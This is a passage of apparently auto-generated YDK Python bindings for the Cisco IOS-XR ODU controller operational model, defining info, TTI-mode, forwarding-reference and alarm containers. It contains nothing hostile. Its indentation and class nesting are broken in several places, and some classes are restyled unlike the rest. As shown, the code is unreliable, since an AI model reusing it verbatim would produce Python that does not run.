    self._child_classes = OrderedDict([("local", ("local", Odu.Controllers.Controller.Info.Local)), ("remote", ("remote", Odu.Controllers.Controller.Info.Remote)), ("tti-mode", ("tti_mode", Odu.Controllers.Controller.Info.TtiMode)), ("odu-fwd-ref", ("odu_fwd_ref", Odu.Controllers.Controller.Info.OduFwdRef)), ("alarm", ("alarm", Odu.Controllers.Controller.Info.Alarm)), ("te-ctx-data", ("te_ctx_data", Odu.Controllers.Controller.Info.TeCtxData)), ("xc-add-ctx-data", ("xc_add_ctx_data", Odu.Controllers.Controller.Info.XcAddCtxData)), ("xc-rem-ctx-data", ("xc_rem_ctx_data", Odu.Controllers.Controller.Info.XcRemCtxData)), ("odu-delay", ("odu_delay", Odu.Controllers.Controller.Info.OduDelay)), ("odu-terminate-ether", ("odu_terminate_ether", Odu.Controllers.Controller.Info.OduTerminateEther)), ("ains-info", ("ains_info", Odu.Controllers.Controller.Info.AinsInfo)), ("odu", ("odu", Odu.Controllers.Controller.Info.Odu_)), ("odutcm", ("odutcm", Odu.Controllers.Controller.Info.Odutcm))])
    # Leaf table: python name -> (YLeaf(type, yang-name), accepted types).
    self._leafs = OrderedDict([
        ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduStateEt', '')])),
        ('sf', (YLeaf(YType.uint8, 'sf'), ['int'])),
        ('sd', (YLeaf(YType.uint8, 'sd'), ['int'])),
        ('loopback_mode', (YLeaf(YType.enumeration, 'loopback-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduLoopBackMode', '')])),
        ('derived_mode', (YLeaf(YType.enumeration, 'derived-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduDerState', '')])),
        ('inherit_sec_state', (YLeaf(YType.enumeration, 'inherit-sec-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduSecState', '')])),
        ('config_sec_state', (YLeaf(YType.enumeration, 'config-sec-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduSecState', '')])),
        ('gcc_mode', (YLeaf(YType.boolean, 'gcc-mode'), ['bool'])),
        ('child_name', (YLeaf(YType.str, 'child-name'), ['str'])),
        ('max_odu_child', (YLeaf(YType.uint8, 'max-odu-child'), ['int'])),
        ('od_uuser', (YLeaf(YType.enumeration, 'od-uuser'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduUserEt', '')])),
        ('resource_state', (YLeaf(YType.enumeration, 'resource-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduResourceEt', '')])),
        ('pt_type', (YLeaf(YType.enumeration, 'pt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPtTypeEt', '')])),
        ('flex_type', (YLeaf(YType.enumeration, 'flex-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduFlexTypeEt', '')])),
        ('flex_bw', (YLeaf(YType.uint32, 'flex-bw'), ['int'])),
        ('flex_tolerence', (YLeaf(YType.uint16, 'flex-tolerence'), ['int'])),
        ('option', (YLeaf(YType.uint8, 'option'), ['int'])),
        ('tpn_value', (YLeaf(YType.uint8, 'tpn-value'), ['int'])),
        ('num_ts', (YLeaf(YType.uint8, 'num-ts'), ['int'])),
        ('ts_g', (YLeaf(YType.enumeration, 'ts-g'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTsGEt', '')])),
        ('ts_b', (YLeaf(YType.str, 'ts-b'), ['str'])),
        ('tpn_b', (YLeaf(YType.str, 'tpn-b'), ['str'])),
        ('pts_b', (YLeaf(YType.str, 'pts-b'), ['str'])),
        ('fwd_ref', (YLeaf(YType.str, 'fwd-ref'), ['str'])),
        ('xc_id', (YLeaf(YType.uint32, 'xc-id'), ['int'])),
        ('xconnect_name', (YLeaf(YType.str, 'xconnect-name'), ['str'])),
        ('fwd_ref_ifhandle', (YLeaf(YType.uint32, 'fwd-ref-ifhandle'), ['int'])),
        ('no_parent_slot', (YLeaf(YType.uint32, 'no-parent-slot'), ['int'])),
        ('xc_resp_code', (YLeaf(YType.enumeration, 'xc-resp-code'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'DpProgrammed', '')])),
        ('performance_monitoring', (YLeaf(YType.enumeration, 'performance-monitoring'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPerMon', '')])),
        ('pmtimca', (YLeaf(YType.enumeration, 'pmtimca'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPmCaEt', '')])),
        ('pm_mode', (YLeaf(YType.enumeration, 'pm-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPmMode', '')])),
        ('nv_optical_support', (YLeaf(YType.boolean, 'nv-optical-support'), ['bool'])),
        ('gmpls_tti_mode', (YLeaf(YType.enumeration, 'gmpls-tti-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'GmplsTtiMode', '')])),
        ('gmpls_tcm_id', (YLeaf(YType.uint8, 'gmpls-tcm-id'), ['int'])),
    ])
    # Leaf values start unset; populated on read from the device.
    self.state = None
    self.sf = None
    self.sd = None
    self.loopback_mode = None
    self.derived_mode = None
    self.inherit_sec_state = None
    self.config_sec_state = None
    self.gcc_mode = None
    self.child_name = None
    self.max_odu_child = None
    self.od_uuser = None
    self.resource_state = None
    self.pt_type = None
    self.flex_type = None
    self.flex_bw = None
    self.flex_tolerence = None
    self.option = None
    self.tpn_value = None
    self.num_ts = None
    self.ts_g = None
    self.ts_b = None
    self.tpn_b = None
    self.pts_b = None
    self.fwd_ref = None
    self.xc_id = None
    self.xconnect_name = None
    self.fwd_ref_ifhandle = None
    self.no_parent_slot = None
    self.xc_resp_code = None
    self.performance_monitoring = None
    self.pmtimca = None
    self.pm_mode = None
    self.nv_optical_support = None
    self.gmpls_tti_mode = None
    self.gmpls_tcm_id = None

    # Instantiate and parent each singleton child container.
    self.local = Odu.Controllers.Controller.Info.Local()
    self.local.parent = self
    self._children_name_map["local"] = "local"

    self.remote = Odu.Controllers.Controller.Info.Remote()
    self.remote.parent = self
    self._children_name_map["remote"] = "remote"

    self.tti_mode = Odu.Controllers.Controller.Info.TtiMode()
    self.tti_mode.parent = self
    self._children_name_map["tti_mode"] = "tti-mode"

    self.odu_fwd_ref = Odu.Controllers.Controller.Info.OduFwdRef()
    self.odu_fwd_ref.parent = self
    self._children_name_map["odu_fwd_ref"] = "odu-fwd-ref"

    self.alarm = Odu.Controllers.Controller.Info.Alarm()
    self.alarm.parent = self
    self._children_name_map["alarm"] = "alarm"

    self.te_ctx_data = Odu.Controllers.Controller.Info.TeCtxData()
    self.te_ctx_data.parent = self
    self._children_name_map["te_ctx_data"] = "te-ctx-data"

    self.xc_add_ctx_data = Odu.Controllers.Controller.Info.XcAddCtxData()
    self.xc_add_ctx_data.parent = self
    self._children_name_map["xc_add_ctx_data"] = "xc-add-ctx-data"

    self.xc_rem_ctx_data = Odu.Controllers.Controller.Info.XcRemCtxData()
    self.xc_rem_ctx_data.parent = self
    self._children_name_map["xc_rem_ctx_data"] = "xc-rem-ctx-data"

    self.odu_delay = Odu.Controllers.Controller.Info.OduDelay()
    self.odu_delay.parent = self
    self._children_name_map["odu_delay"] = "odu-delay"

    self.odu_terminate_ether = Odu.Controllers.Controller.Info.OduTerminateEther()
    self.odu_terminate_ether.parent = self
    self._children_name_map["odu_terminate_ether"] = "odu-terminate-ether"

    self.ains_info = Odu.Controllers.Controller.Info.AinsInfo()
    self.ains_info.parent = self
    self._children_name_map["ains_info"] = "ains-info"

    # YANG list nodes: zero or more entries each.
    self.odu = YList(self)
    self.odutcm = YList(self)
    self._segment_path = lambda: "info"
    # Set last, after all construction-time assignments are done.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate attribute writes; lists every leaf name of this container.
    self._perform_setattr(Odu.Controllers.Controller.Info, ['state', 'sf', 'sd', 'loopback_mode', 'derived_mode', 'inherit_sec_state', 'config_sec_state', 'gcc_mode', 'child_name', 'max_odu_child', 'od_uuser', 'resource_state', 'pt_type', 'flex_type', 'flex_bw', 'flex_tolerence', 'option', 'tpn_value', 'num_ts', 'ts_g', 'ts_b', 'tpn_b', 'pts_b', 'fwd_ref', 'xc_id', 'xconnect_name', 'fwd_ref_ifhandle', 'no_parent_slot', 'xc_resp_code', 'performance_monitoring', 'pmtimca', 'pm_mode', 'nv_optical_support', 'gmpls_tti_mode', 'gmpls_tcm_id'], name, value)
class Local(_Entity_):
    """
    TTI

    .. attribute:: router_id

        Router ID
        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: if_index

        IfIndex
        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Build the 'local' container (router-id and if-index leafs)."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Local, self).__init__()

        self.yang_name = "local"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
            ('if_index', (YLeaf(YType.uint32, 'if-index'), ['int'])),
        ])
        self.router_id = None
        self.if_index = None
        self._segment_path = lambda: "local"
        # Set last, after all construction-time assignments are done.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate attribute writes; lists the container's leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.Local, ['router_id', 'if_index'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Local']['meta_info']
class Remote(_Entity_):
    """
    Remote

    .. attribute:: router_id

        Router ID
        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: if_index

        IfIndex
        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Build the 'remote' container (router-id and if-index leafs)."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Remote, self).__init__()

        self.yang_name = "remote"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
            ('if_index', (YLeaf(YType.uint32, 'if-index'), ['int'])),
        ])
        self.router_id = None
        self.if_index = None
        self._segment_path = lambda: "remote"
        # Set last, after all construction-time assignments are done.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate attribute writes; lists the container's leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.Remote, ['router_id', 'if_index'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Remote']['meta_info']
class TtiMode(_Entity_):
"""
TTI
.. attribute:: tx
String Sent
**type**\: :py:class:`Tx <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode.Tx>`
**config**\: False
.. attribute:: exp
String Expected
**type**\: :py:class:`Exp <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode.Exp>`
**config**\: False
.. attribute:: rec
String Received
**type**\: :py:class:`Rec <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode.Rec>`
**config**\: False
.. attribute:: g709tti_sent_mode
G709TTI Sent
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
.. attribute:: g709tti_exp_mode
G709TTI Expected
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
.. attribute:: g709tti_rec_mode
G709TTI Recieved
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'tti-mode' container: three TTI-mode leafs and the
    tx/exp/rec string containers."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Odu.Controllers.Controller.Info.TtiMode, self).__init__()

    self.yang_name = "tti-mode"
    self.yang_parent_name = "info"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Maps YANG child name -> (python attribute name, child class).
    self._child_classes = OrderedDict([("tx", ("tx", Odu.Controllers.Controller.Info.TtiMode.Tx)), ("exp", ("exp", Odu.Controllers.Controller.Info.TtiMode.Exp)), ("rec", ("rec", Odu.Controllers.Controller.Info.TtiMode.Rec))])
    self._leafs = OrderedDict([
        ('g709tti_sent_mode', (YLeaf(YType.enumeration, 'g709tti-sent-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
        ('g709tti_exp_mode', (YLeaf(YType.enumeration, 'g709tti-exp-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
        ('g709tti_rec_mode', (YLeaf(YType.enumeration, 'g709tti-rec-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
    ])
    self.g709tti_sent_mode = None
    self.g709tti_exp_mode = None
    self.g709tti_rec_mode = None

    # Instantiate and parent the sent/expected/received TTI containers.
    self.tx = Odu.Controllers.Controller.Info.TtiMode.Tx()
    self.tx.parent = self
    self._children_name_map["tx"] = "tx"

    self.exp = Odu.Controllers.Controller.Info.TtiMode.Exp()
    self.exp.parent = self
    self._children_name_map["exp"] = "exp"

    self.rec = Odu.Controllers.Controller.Info.TtiMode.Rec()
    self.rec.parent = self
    self._children_name_map["rec"] = "rec"

    self._segment_path = lambda: "tti-mode"
    # Set last, after all construction-time assignments are done.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate attribute writes; lists the container's leaf names.
    self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode, ['g709tti_sent_mode', 'g709tti_exp_mode', 'g709tti_rec_mode'], name, value)
class Tx(_Entity_):
    """
    String Sent

    .. attribute:: sapi

        tx String
        **type**\: list of int

        **range:** 0..255

        **config**\: False

    .. attribute:: dapi

        exp String
        **type**\: list of int

        **range:** 0..255

        **config**\: False

    .. attribute:: operator_specific

        rec String
        **type**\: list of int

        **range:** 0..255

        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Build the 'tx' container: three leaf-lists of byte values."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.TtiMode.Tx, self).__init__()

        self.yang_name = "tx"
        self.yang_parent_name = "tti-mode"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # YLeafList (not YLeaf): each leaf holds a list of uint8 values.
        self._leafs = OrderedDict([
            ('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
            ('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
            ('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
        ])
        self.sapi = []
        self.dapi = []
        self.operator_specific = []
        self._segment_path = lambda: "tx"
        # Set last, after all construction-time assignments are done.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate attribute writes; lists the container's leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode.Tx, ['sapi', 'dapi', 'operator_specific'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode.Tx']['meta_info']
class Exp(_Entity_):
    """
    String Expected

    .. attribute:: sapi

        tx String
        **type**\: list of int

        **range:** 0..255

        **config**\: False

    .. attribute:: dapi

        exp String
        **type**\: list of int

        **range:** 0..255

        **config**\: False

    .. attribute:: operator_specific

        rec String
        **type**\: list of int

        **range:** 0..255

        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Build the 'exp' container: three leaf-lists of byte values."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.TtiMode.Exp, self).__init__()

        self.yang_name = "exp"
        self.yang_parent_name = "tti-mode"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # YLeafList (not YLeaf): each leaf holds a list of uint8 values.
        self._leafs = OrderedDict([
            ('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
            ('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
            ('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
        ])
        self.sapi = []
        self.dapi = []
        self.operator_specific = []
        self._segment_path = lambda: "exp"
        # Set last, after all construction-time assignments are done.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate attribute writes; lists the container's leaf names.
        self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode.Exp, ['sapi', 'dapi', 'operator_specific'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import of the generated meta module.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode.Exp']['meta_info']
class Rec(_Entity_):
    """
    String Received.

    Read-only operational data (``config: False``); every attribute is a
    uint8 leaf-list surfaced as a Python list of ints in the range 0..255.

    .. attribute:: sapi

        tx String — **type**: list of int, **range:** 0..255

    .. attribute:: dapi

        exp String — **type**: list of int, **range:** 0..255

    .. attribute:: operator_specific

        rec String — **type**: list of int, **range:** 0..255
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible chained constructor call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.TtiMode.Rec, self).__init__()
        self.yang_name = "rec"
        self.yang_parent_name = "tti-mode"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # (python attribute, YANG leaf name) pairs; all are uint8 leaf-lists.
        leaf_spec = (
            ('sapi', 'sapi'),
            ('dapi', 'dapi'),
            ('operator_specific', 'operator-specific'),
        )
        self._leafs = OrderedDict(
            (attr, (YLeafList(YType.uint8, yang), ['int']))
            for attr, yang in leaf_spec
        )
        self.sapi = []
        self.dapi = []
        self.operator_specific = []
        self._segment_path = lambda: "rec"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK entity machinery so leaf writes are validated.
        self._perform_setattr(
            Odu.Controllers.Controller.Info.TtiMode.Rec,
            ['sapi', 'dapi', 'operator_specific'],
            name,
            value,
        )

    @staticmethod
    def _meta_info():
        """Return the generated meta-info record for this container."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode.Rec']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info record for the TtiMode container."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
    table = meta._meta_table
    return table['Odu.Controllers.Controller.Info.TtiMode']['meta_info']
class OduFwdRef(_Entity_):
    """
    ODU fwd_ref.

    Read-only operational data (``config: False``).

    .. attribute:: od_uuser

        ODU User — **type**:
        :py:class:`OduUserEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduUserEt>`

    .. attribute:: resource_state

        Resource State — **type**:
        :py:class:`OduResourceEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduResourceEt>`
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible chained constructor call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.OduFwdRef, self).__init__()
        self.yang_name = "odu-fwd-ref"
        self.yang_parent_name = "info"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Both leafs are enumerations declared in the same bundle module.
        enum_module = 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper'
        leaf_spec = (
            ('od_uuser', 'od-uuser', 'OduUserEt'),
            ('resource_state', 'resource-state', 'OduResourceEt'),
        )
        self._leafs = OrderedDict(
            (attr, (YLeaf(YType.enumeration, yang), [(enum_module, enum_cls, '')]))
            for attr, yang, enum_cls in leaf_spec
        )
        self.od_uuser = None
        self.resource_state = None
        self._segment_path = lambda: "odu-fwd-ref"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Delegate to the YDK entity machinery so leaf writes are validated.
        self._perform_setattr(
            Odu.Controllers.Controller.Info.OduFwdRef,
            ['od_uuser', 'resource_state'],
            name,
            value,
        )

    @staticmethod
    def _meta_info():
        """Return the generated meta-info record for this container."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.OduFwdRef']['meta_info']
class Alarm(_Entity_):
"""
Alarm
.. attribute:: oci
Open Connection Indiction
**type**\: :py:class:`Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Oci>`
**config**\: False
.. attribute:: ais
Alarm Indication Signal
**type**\: :py:class:`Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Ais>`
**config**\: False
.. attribute:: lck
Upstream Connection Locked
**type**\: :py:class:`Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Lck>`
**config**\: False
.. attribute:: bdi
Backward Defect Indication
**type**\: :py:class:`Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Bdi>`
**config**\: False
.. attribute:: eoc
GCC End of Channel
**type**\: :py:class:`Eoc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Eoc>`
**config**\: False
.. attribute:: ptim
Payload Type Identifier Mismatch
**type**\: :py:class:`Ptim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Ptim>`
**config**\: False
.. attribute:: tim
Trace Identifier Mismatch information
**type**\: :py:class:`Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tim>`
**config**\: False
.. attribute:: iae
Incoming Alignment Error
**type**\: :py:class:`Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Iae>`
**config**\: False
.. attribute:: biae
Backward Incoming Alignment Error
**type**\: :py:class:`Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Biae>`
**config**\: False
.. attribute:: sf_ber
SF BER alarm
**type**\: :py:class:`SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.SfBer>`
**config**\: False
.. attribute:: sd_ber
SD BER alarm
**type**\: :py:class:`SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.SdBer>`
**config**\: False
.. attribute:: csf
Client Signal Failure
**type**\: :py:class:`Csf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Csf>`
**config**\: False
.. attribute:: tcm1_ais
TCM1 Alarm Indication Signal
**type**\: :py:class:`Tcm1Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Ais>`
**config**\: False
.. attribute:: tcm1_ltc
TCM1 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm1Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc>`
**config**\: False
.. attribute:: tcm1_oci
TCM1 Open Connection Indiction
**type**\: :py:class:`Tcm1Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Oci>`
**config**\: False
.. attribute:: tcm1_lck
TCM1 Upstream Connection Locked
**type**\: :py:class:`Tcm1Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Lck>`
**config**\: False
.. attribute:: tcm1_iae
TCM1 Incoming Alignment Error
**type**\: :py:class:`Tcm1Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Iae>`
**config**\: False
.. attribute:: tcm1_biae
TCM1 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm1Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Biae>`
**config**\: False
.. attribute:: tcm1_bdi
TCM1 Backward Defect Monitoring
**type**\: :py:class:`Tcm1Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi>`
**config**\: False
.. attribute:: tcm1_tim
TCM1 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm1Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Tim>`
**config**\: False
.. attribute:: tcm1_sf_ber
TCM1 SF BER alarm
**type**\: :py:class:`Tcm1SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer>`
**config**\: False
.. attribute:: tcm1_sd_ber
TCM1 SD BER alarm
**type**\: :py:class:`Tcm1SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer>`
**config**\: False
.. attribute:: tcm2_ais
TCM2 Alarm Indication Signal
**type**\: :py:class:`Tcm2Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Ais>`
**config**\: False
.. attribute:: tcm2_ltc
TCM2 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm2Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc>`
**config**\: False
.. attribute:: tcm2_oci
TCM2 Open Connection Indiction
**type**\: :py:class:`Tcm2Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Oci>`
**config**\: False
.. attribute:: tcm2_lck
TCM2 Upstream Connection Locked
**type**\: :py:class:`Tcm2Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Lck>`
**config**\: False
.. attribute:: tcm2_iae
TCM2 Incoming Alignment Error
**type**\: :py:class:`Tcm2Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Iae>`
**config**\: False
.. attribute:: tcm2_biae
TCM2 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm2Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Biae>`
**config**\: False
.. attribute:: tcm2_bdi
TCM2 Backward Defect Monitoring
**type**\: :py:class:`Tcm2Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi>`
**config**\: False
.. attribute:: tcm2_tim
TCM2 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm2Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Tim>`
**config**\: False
.. attribute:: tcm2_sf_ber
TCM2 SF BER alarm
**type**\: :py:class:`Tcm2SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2SfBer>`
**config**\: False
.. attribute:: tcm2_sd_ber
TCM2 SD BER alarm
